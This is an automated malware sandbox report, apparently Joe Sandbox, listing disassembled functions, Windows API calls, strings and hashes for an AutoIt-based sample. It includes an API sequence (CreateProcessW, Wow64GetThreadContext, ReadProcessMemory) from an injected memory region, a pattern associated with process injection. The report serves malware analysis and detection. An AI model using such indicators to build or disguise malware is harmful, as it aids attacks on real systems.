                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3170942423-0
                                                                                                                                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #v
                                                                                                                                              • API String ID: 0-554117064
                                                                                                                                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentTerminate
                                                                                                                                              • String ID: #v
                                                                                                                                              • API String ID: 2429186680-554117064
                                                                                                                                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 04038A8B
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04038B21
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04038B43
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2438371351-0
                                                                                                                                              • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                                              • Instruction ID: 1cde83831559da28da24c35257ec1d5a6609d41eefb2f89f4a6eaceaa84b9cee
                                                                                                                                              • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                                              • Instruction Fuzzy Hash: B8622D70A14218DBEB24DFA4C840BDEB776EF58301F1091A9E10DEB390E775AE81CB59
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: Error:
                                                                                                                                              • API String ID: 4104443479-232661952
                                                                                                                                              • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                              • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                                              APIs
                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                              • String ID: X$pWH
                                                                                                                                              • API String ID: 85490731-941433119
                                                                                                                                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1794320848-0
                                                                                                                                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                              APIs
                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IconNotifyShell_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1144537725-0
                                                                                                                                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                              APIs
                                                                                                                                              • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                              • _malloc.LIBCMT ref: 0043215D
                                                                                                                                              • _malloc.LIBCMT ref: 0043216F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _malloc$AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 680241177-0
                                                                                                                                              • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                              • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                              • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                              • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                              APIs
                                                                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4217535847-0
                                                                                                                                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                                                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                              • _free.LIBCMT ref: 004295A0
                                                                                                                                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                              • API String ID: 3938964917-2806939583
                                                                                                                                              • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                              • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                              Strings
                                                                                                                                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcat
                                                                                                                                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                              • API String ID: 1765576173-2684727018
                                                                                                                                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                              • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                                              • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                                              APIs
                                                                                                                                              • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4163294574-0
                                                                                                                                              • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                              • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                              • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                              • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                              • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
